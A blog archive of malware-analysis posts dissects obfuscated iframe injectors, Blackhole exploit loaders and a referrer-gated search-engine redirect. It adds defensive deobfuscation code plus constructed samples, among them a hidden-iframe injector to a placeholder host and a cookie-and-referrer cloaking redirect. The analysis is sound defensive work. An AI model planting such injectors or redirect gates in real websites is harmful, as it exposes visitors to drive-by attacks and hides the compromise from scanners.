Tag Archive: eval


The VaNcZwAmM Variant

I just had to examine this interesting topic on the avast! forums. Check out the Sucuri results; I’ve never seen that before! =O

I sent the URL to Quttera. Check out the results. OK, let’s pick one of the URLs. I picked GET /forum/forumdisplay.php?fid=124. Look what I found just below the closing HTML tag:

We can beautify the following code as follows:

Looking at the first line, we can instantly see v%@a~@@#r, which is var with junk characters inserted. Because there is a function that calls string.replace() with a regular expression, we can tell that symbols like these are stripped from the string before it is returned. If you look at the code on lines 29 and 30, you can make out .appendChild(o). This is the fully deobfuscated content:

Of course you want to see the VirusTotal results ;)

Original (As seen in Figure 2) | Deobfuscated (As seen in Figure 3)

Notice that the two scans give different antivirus findings. The original obfuscated content is detected by Avast! (JS:Iframe-EQ [Trj]) and Kaspersky (HEUR:Trojan-Downloader.Script.Generic), while the deobfuscated content is detected by Commtouch (JS/IFrame.GN.gen), F-Prot (JS/IFrame.GN.gen), and K7AntiVirus (Riskware). A fail for the antivirus community, I must say.
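The junk-stripping step described above, as an added example that is not the page’s own code. Both strings are constructed here in the shape the post describes: VaNcZwAmM (only the name is taken from the post) holds real JavaScript with %, @, ~ and # sprinkled through it, and LOADER is the kind of call that strips them with a character-class regex and hands the result to eval(). The iframe URL is a placeholder. Rather than letting eval() do the work, the analyst lifts the character class out of the loader’s own replace() call, applies it statically, and reads the iframe target out of the cleaned code.

```javascript
// Added example, not code from the page. Both strings below are constructed:
// VaNcZwAmM holds real JavaScript with junk characters (%, @, ~, #) sprinkled
// through it, and LOADER is the kind of call that strips them and evaluates the
// result. The iframe URL is a placeholder.
const VaNcZwAmM =
  'v%@a~@@#r o=d@oc#um~ent.cr%eate@Ele#ment("if~ra#me");' +
  'o.s%rc="http://example.invalid/x";o.wi~dth=1;o.he@ight=1;' +
  'd%ocu#ment.b~ody.app@end#Child(o);';
const LOADER = 'eval(VaNcZwAmM.replace(/[%@~#]/g, ""))';

// Static deobfuscation: lift the character class out of the loader's own
// .replace(/[...]/g, "") call and apply it ourselves, so the cleaned code is
// never executed.
function stripJunk(loaderSource, blob) {
  const m = /\.replace\(\/(\[[^\]]+\])\/g,\s*(["'])\2\)/.exec(loaderSource);
  if (!m) throw new Error("no .replace(/[...]/g, '') call found in loader");
  return blob.replace(new RegExp(m[1], "g"), "");
}

// Pull out whatever gets assigned to .src; for an iframer that is the landing
// page the victim's browser would silently load.
function iframeTargets(code) {
  const targets = [];
  const re = /\.src\s*=\s*(["'])([^"']+)\1/g;
  let m;
  while ((m = re.exec(code)) !== null) targets.push(m[2]);
  return targets;
}

// Cleaned source plus the iframe target(s) it points at.
function deobfuscate() {
  const clean = stripJunk(LOADER, VaNcZwAmM);
  return { clean, targets: iframeTargets(clean) };
}

console.log(deobfuscate());
```

The same approach works for any variant whose loader is a single replace() with a character class: the regex that removes the junk is always shipped alongside the blob, so there is no need to run the script to recover the iframe it injects.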

Since the most used variable is VaNcZwAmM, I will call this the VaNcZwAmM variant,
~!Donovan

A user reported on the avast! forums that another site was found infected with the Blackhole exploit. Confirmed with urlQuery and Sucuri. Researching the Blackhole site: Google says it has infected over 23 sites, while Sucuri says it’s been used for redirection.

So, just how many scanners will detect this (besides urlQuery and Sucuri, of course)?

Interesting,
~!Donovan

Blackhole Exploit Please Wait Page

Today, Polonus reported 2 Blackhole exploit sites here. Let’s examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, which fails, and execution falls through to the catch block. The catch parameter is the usual zxc that many Blackhole variants use. It then defines n as an array of numbers and loops over it, appending each value to s via String.fromCharCode(). Finally, two if statements that are practically always true hand the string s to eval(), which runs it as JavaScript.

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1 apart from a few differences: Variant 2 tries to define a variable as eval prototype instead, and the second if statement from Variant 1 is not present.

Both scripts deobfuscate to an iframer pointing at a Blackhole exploit site. Both files are named mail.htm. Searching CleanMX shows there are others out there. Here is an example VirusTotal result: only 2 engines detect it.
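The try/catch loader described for both variants, as an added example that is not the page’s sample. SAMPLE is constructed in the shape the post describes: a try block whose expression throws because n is undeclared, a catch(zxc) block that rebuilds a string from an array of character codes, and two effectively always-true ifs guarding eval(s); the codes spell a harmless document.write() call rather than the real iframer. Two ways to get at the payload are shown: decoding the array statically, and running the script with eval swapped for a function that records its argument. The second route also shows that the payload only surfaces when the try block throws; seeding n beforehand makes the catch branch, and with it the eval, disappear.

```javascript
// Added example, not the page's sample. SAMPLE is constructed in the shape the
// post describes: a try block whose expression throws because n is undeclared,
// a catch(zxc) block that rebuilds a string from an array of character codes,
// and two effectively always-true ifs guarding eval(s). The codes spell a
// harmless document.write() call, not the real iframer.
const SAMPLE = `
try { n ^= eval; } catch (zxc) {
  n = [100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,104,105,34,41];
  s = "";
  for (i = 0; i < n.length; i++) s += String.fromCharCode(n[i]);
  if (s.length > 1) if (zxc) eval(s);
}
`;

// Static route: find the numeric array and decode it with fromCharCode, the
// same way the script does, without running any of it.
function decodeCharCodeArray(src) {
  const m = /\[\s*(\d+(?:\s*,\s*\d+)*)\s*\]/.exec(src);
  if (!m) return null;
  return String.fromCharCode(...m[1].split(",").map((x) => parseInt(x.trim(), 10)));
}

// Dynamic route: run the script with every free identifier resolved through a
// Proxy. Reads of names that exist neither in `vars` nor among the builtins
// throw ReferenceError (exactly what the try block relies on), writes land in
// `vars` instead of the real global object, and `eval` resolves to a function
// that records its argument instead of executing it. `predefined` seeds
// variables so we can see what happens when the try block does not throw.
function captureEval(src, predefined = {}) {
  const captured = [];
  const vars = Object.assign(
    Object.create(null),
    { eval: (code) => { captured.push(String(code)); } },
    predefined,
  );
  const scope = new Proxy(vars, {
    has: () => true, // claim every name so `with` routes all lookups here
    get(target, key) {
      if (typeof key === "symbol") return undefined; // Symbol.unscopables probe from `with`
      if (key in target) return target[key];
      if (key in globalThis) return globalThis[key]; // String, Array, ... still work
      throw new ReferenceError(`${key} is not defined`);
    },
    set(target, key, value) { target[key] = value; return true; },
  });
  // Function-constructor code is sloppy mode, which is what `with` needs.
  new Function("scope", `with (scope) { ${src} }`)(scope);
  return captured;
}

console.log(decodeCharCodeArray(SAMPLE));
console.log(captureEval(SAMPLE));           // try threw: payload reaches our eval
console.log(captureEval(SAMPLE, { n: 0 })); // try did not throw: catch skipped, nothing captured
```

The point of the second call is worth keeping in mind when building an analysis harness: a sandbox that helpfully predefines variables the script references can silence the very error the loader depends on, and the decoded stage never appears.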

Be prepared,
~!Donovan

Billion Homepage

The problem was originally found by avast! antivirus; a regular user reported it on the avast! forums here.

Yesterday, urlQuery reported 2 evals. The first one is the important one, so let’s start there. CleanMX has the evidence in hex.

Billion Exploit In Hex

Which deobfuscates to something like this:
Billion Exploit Base 1 Decoded

That deobfuscates to this:

Billion Exploit Base 2 Decoded

That can be simplified like this:
Billion Exploit Base 3 Decoded

Now that we have a good, clean image of the malware at hand, we can see that it checks document.referrer, that is, where the visitor came to this site from. If the visitor came from a major search engine, it creates a cookie and redirects them. Scanning the URL at VirusTotal returns nothing; URLVoid, however, reports issues. This also tells us that sites hosted on the IP 66.199.231.59 should be considered suspicious.
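The referrer gate described above, as an added example that is not the page’s decoded script. It is a constructed model of the behaviour the post describes: inspect document.referrer, and if the visitor arrived from a major search engine, set a cookie and redirect. The engine list, cookie name and landing URL are assumptions, as is the cookie’s purpose (marking a visitor who has already been redirected once). The decision logic is kept in a pure function so the gate can be exercised with different visitor states without a browser.

```javascript
// Added example, not the page's decoded script. A constructed model of the
// behaviour the post describes: inspect document.referrer, and if the visitor
// arrived from a major search engine, set a cookie and redirect. The engine
// list, cookie name and landing URL are assumptions; the cookie is assumed to
// mark a visitor who has already been redirected once.
const SEARCH_ENGINES = /^https?:\/\/([a-z0-9-]+\.)*(google|bing|yahoo|ask|aol)\.[a-z.]+\//i;
const MARK = "visited=1";
const LANDING = "http://redirect.invalid/";

// Pure decision function: takes the document state as plain strings so the
// gate can be exercised outside a browser. Returns the redirect target or null.
function shouldRedirect(referrer, cookie) {
  if (cookie.split(/;\s*/).includes(MARK)) return null; // already served once
  if (!SEARCH_ENGINES.test(referrer)) return null;      // direct hit, scanner, or site owner
  return LANDING;
}

// What the injected script would do to a live document (or a stand-in object).
function applyGate(doc) {
  const target = shouldRedirect(doc.referrer || "", doc.cookie || "");
  if (target) {
    doc.cookie = MARK + "; path=/";
    doc.location = target;
  }
  return target;
}

// Constructed visitor states. Only the first search-engine visit is redirected;
// a scanner fetching the URL directly (no Referer) sees a clean page.
function probe() {
  return {
    direct: shouldRedirect("", ""),
    fromGoogle: shouldRedirect("https://www.google.com/search?q=billion", ""),
    fromGoogleAgain: shouldRedirect("https://www.google.com/search?q=billion", "visited=1"),
    fromOtherSite: shouldRedirect("https://www.example.com/links.html", ""),
  };
}

console.log(probe());
```

This is why a scanner that fetches the URL directly can come back clean: to reproduce what a search-engine visitor sees, fetch the page once with a Referer header pointing at a search engine and once without, from a session with no cookies, and diff the two responses.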

The site is now under maintenance to remove the malicious content. They should also update their Apache software: the latest release is 2.4.2, while they are running 1.3.37.

Keep your software up to date,
~!Donovan